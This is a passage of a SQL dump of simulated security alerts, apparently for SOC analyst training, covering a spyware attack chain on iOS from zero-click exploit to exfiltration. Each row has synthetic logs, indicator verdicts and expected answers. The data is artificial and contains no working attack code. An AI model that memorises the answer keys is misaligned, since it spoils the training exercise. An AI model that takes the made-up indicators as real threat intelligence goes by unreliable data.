detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.385Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.55\\\",\\\"destination_port\\\":443,\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"Sensitive_Communications.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"rule_triggered\\\":\\\"Exfiltration Rule 7\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1532, 'Initial Access via Zero-Click iCloud Calendar Exploit', 'high', 'Network Traffic Logs', 'An unauthorized access attempt was detected originating from a known malicious IP address. The attack leveraged a zero-click vulnerability in iCloud calendar invites, targeting iOS devices. The adversary, identified as Quadream, used this exploit to gain unauthorized access, potentially compromising sensitive information.', 'Phishing Attack', 'T1189: Drive-by Compromise', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"network_traffic\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"protocol\":\"HTTPS\",\"source_port\":443,\"destination_port\":52334,\"malicious_url\":\"https://malicious-calendar-invite.com/icalendar\",\"filename\":\"invitation.ics\",\"file_hash\":\"a9f5b3c7e812f3d6b7e695f6c29e1e4f\",\"username\":\"victim_user\",\"user_agent\":\"iOS/14.8.1 (iPhone; CPU iPhone OS 14_8_1 like Mac OS X)\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Assets\",\"verdict\":\"internal\",\"details\":\"Internal iOS device.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://malicious-calendar-invite.com/icalendar\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing URL Database\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing calendar invites.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a9f5b3c7e812f3d6b7e695f6c29e1e4f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash linked to known iCalendar exploit.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1533, 'Execution of REIGN Spyware on iOS', 'high', 'Device Forensics', 'The REIGN spyware was successfully installed and executed on the compromised iOS device. The spyware is designed to monitor and control device activity, posing a significant threat to user privacy and security.', 'Malware Execution', 'T1059: Command and Scripting Interpreter', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-12T14:22:31Z\",\"device_id\":\"iOS-Device-001\",\"user\":\"jdoe\",\"src_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"malware_name\":\"REIGN\",\"malware_hash\":\"8f14e45fceea167a5a36dedd4bea2543\",\"filename\":\"reign_install.pkg\",\"command_executed\":\"/bin/sh -c install_reign.sh\",\"persistence_method\":\"launch_daemon\",\"os_version\":\"iOS 15.4\",\"detection_tool\":\"Forensic Analyzer v4.2\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"8f14e45fceea167a5a36dedd4bea2543\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known REIGN spyware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"reign_install.pkg\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Database\",\"verdict\":\"malicious\",\"details\":\"File identified as part of REIGN spyware installation.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account on the compromised device.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.390Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:31Z\\\",\\\"device_id\\\":\\\"iOS-Device-001\\\",\\\"user\\\":\\\"jdoe\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"malware_name\\\":\\\"REIGN\\\",\\\"malware_hash\\\":\\\"8f14e45fceea167a5a36dedd4bea2543\\\",\\\"filename\\\":\\\"reign_install.pkg\\\",\\\"command_executed\\\":\\\"/bin/sh -c install_reign.sh\\\",\\\"persistence_method\\\":\\\"launch_daemon\\\",\\\"os_version\\\":\\\"iOS 15.4\\\",\\\"detection_tool\\\":\\\"Forensic Analyzer v4.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1534, 'Establishing Persistence on iOS Devices', 'high', 'System Logs', 'REIGN deploys a persistence mechanism on an iOS device by installing a malicious profile named \'com.apple.security\' that ensures continuous access even after reboots or updates. The activity is sourced from a suspicious external IP, indicating a potential compromise.', 'Persistence Mechanism', 'T1547.014', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-04T11:45:23Z\",\"event_type\":\"profile_install\",\"device_id\":\"ios-device-1234\",\"user\":\"jdoe\",\"profile_name\":\"com.apple.security\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"file_hash\":\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\",\"filename\":\"malicious_profile.mobileconfig\",\"action\":\"install\",\"status\":\"successful\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server involved in targeted attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Identified as part of REIGN\'s persistent attack toolkit.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_profile.mobileconfig\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local System Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual profile name for device management.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Standard user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T11:45:23Z\\\",\\\"event_type\\\":\\\"profile_install\\\",\\\"device_id\\\":\\\"ios-device-1234\\\",\\\"user\\\":\\\"jdoe\\\",\\\"profile_name\\\":\\\"com.apple.security\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"file_hash\\\":\\\"46b7f3c55b59d4c1a71f3c5e5d4f8f7a\\\",\\\"filename\\\":\\\"malicious_profile.mobileconfig\\\",\\\"action\\\":\\\"install\\\",\\\"status\\\":\\\"successful\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1535, 'Lateral Movement to Connected iCloud Services', 'high', 'Cloud Access Logs', 'The spyware leverages obtained credentials to move laterally, accessing other iCloud services linked to the target, expanding the attack scope. The attacker utilized compromised credentials to log into multiple iCloud accounts, indicating a progression in the attack chain aimed at exfiltrating sensitive data.', 'Credential Access', 'T1078 - Valid Accounts', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-12T14:45:00Z\",\"event\":\"login\",\"source_ip\":\"203.0.113.45\",\"destination_service\":\"iCloud\",\"user\":\"compromisedUser@icloud.com\",\"action\":\"successful login\",\"associated_ip\":\"192.168.1.15\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_payload.exe\",\"correlation_id\":\"abcd1234efgh5678\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromisedUser@icloud.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Username used in unauthorized access attempts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to malware used in lateral movement activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.408Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:45:00Z\\\",\\\"event\\\":\\\"login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_service\\\":\\\"iCloud\\\",\\\"user\\\":\\\"compromisedUser@icloud.com\\\",\\\"action\\\":\\\"successful login\\\",\\\"associated_ip\\\":\\\"192.168.1.15\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"malicious_payload.exe\\\",\\\"correlation_id\\\":\\\"abcd1234efgh5678\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1536, 'Exfiltration of Sensitive Data to External Servers', 'high', 'Outbound Network Traffic', 'Sensitive information gathered by REIGN is silently exfiltrated to external servers, providing valuable intelligence to Quadream\'s government clients.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'Closed', 283, '{\"timestamp\":\"2023-10-15T14:23:15Z\",\"source_ip\":\"10.0.3.15\",\"destination_ip\":\"203.0.113.45\",\"source_port\":54321,\"destination_port\":443,\"protocol\":\"HTTPS\",\"file_name\":\"classified_data.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"status\":\"success\"}', '2026-03-15 19:11:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known Quadream-controlled server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"suspicious\",\"details\":\"Associated with data exfiltration activities\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"classified_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file involved in exfiltration\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
